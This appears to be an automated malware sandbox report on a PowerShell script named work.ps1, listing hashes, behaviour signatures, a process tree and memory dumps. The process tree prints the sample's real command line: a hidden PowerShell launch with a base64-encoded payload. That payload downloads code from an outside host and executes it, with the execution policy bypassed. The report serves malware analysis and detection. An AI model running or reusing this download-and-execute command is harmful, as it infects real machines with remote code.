Overview

overview

10

Static

static

work.ps1

windows7_x64

10

work.ps1

windows10_x64

8

Analysis

  • max time kernel
    152s
  • max time network
    130s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    25-08-2021 14:49

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    work.ps1

  • Size

    1.4MB

  • MD5

    7ba4b5c5d3e3276a3cfe8d581cf7173b

  • SHA1

    79ba87b46562e75f097c1b6d23d3b63b9160bbaa

  • SHA256

    73737bf28fa00ea1380bf98a76f6c2ff34bf25e8b489750acccc45df8e898022

  • SHA512

    ccccc4402edc1c333f2b11955b4c2850f5b68674e473d57521cb009e2047a46f9c57c0151b9191d4a2e3b10931723d0191bba9b299ffb3bb293ff7d6f83598c6

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Modifies registry class 9 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\work.ps1
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:804
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -enc JABNAD0AWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoAQwByAGUAYQB0AGUAKAAnAGgAdAB0AHAAOgAvAC8AYQB0AGgAaQBuAGcAYwBhAGwAbABlAGQAYwBhAGsAZQAuAGMAbwBtAC8AZgBpAGwAZQAnACkAOwAkAHQAPQAkAE0ALgBHAGUAdABSAGUAcwBwAG8AbgBzAGUAKAApADsAJABSAD0AJAB0AC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtACgAKQA7ACQARgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAgACQAUgA7ACQAcAA9ACQARgAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AGkAZQB4ACgAJABwACkAOwAgAA==
      2⤵
      • Blocklisted process makes network request
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2080

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/804-119-0x000001C76F053000-0x000001C76F055000-memory.dmp

    Filesize

    8KB

    Download

  • memory/804-118-0x000001C76F050000-0x000001C76F052000-memory.dmp

    Filesize

    8KB

    Download

  • memory/804-120-0x000001C76F220000-0x000001C76F221000-memory.dmp

    Filesize

    4KB

    Download

  • memory/804-123-0x000001C76F3D0000-0x000001C76F3D1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/804-142-0x000001C76F056000-0x000001C76F058000-memory.dmp

    Filesize

    8KB

    Download

  • memory/804-172-0x000001C76F058000-0x000001C76F059000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2080-147-0x0000000000000000-mapping.dmp

    Download

  • memory/2080-165-0x000001E3BD620000-0x000001E3BD622000-memory.dmp

    Filesize

    8KB

    Download

  • memory/2080-166-0x000001E3BD623000-0x000001E3BD625000-memory.dmp

    Filesize

    8KB

    Download

  • memory/2080-173-0x000001E3BD626000-0x000001E3BD628000-memory.dmp

    Filesize

    8KB

    Download

  • memory/2080-892-0x000001E3BD628000-0x000001E3BD62A000-memory.dmp

    Filesize

    8KB

    Download